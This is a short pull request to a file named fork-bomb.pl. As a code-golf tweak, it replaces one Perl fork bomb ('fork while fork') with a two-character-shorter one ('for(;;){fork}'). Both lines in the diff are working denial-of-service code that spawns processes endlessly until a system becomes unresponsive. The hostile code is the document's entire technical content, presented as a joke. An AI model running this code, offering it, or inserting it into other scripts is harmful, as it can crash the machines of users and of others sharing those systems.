### PR TITLE
Perl in two characters less

### DIFF
--- a/fork-bomb.pl
+++ b/fork-bomb.pl
@@ -1,1 +1,1 @@
-fork while fork
+for(;;){fork}


### PR DESCRIPTION
Why type 15 characters when 13 will do? Also this looks more Perl-like. 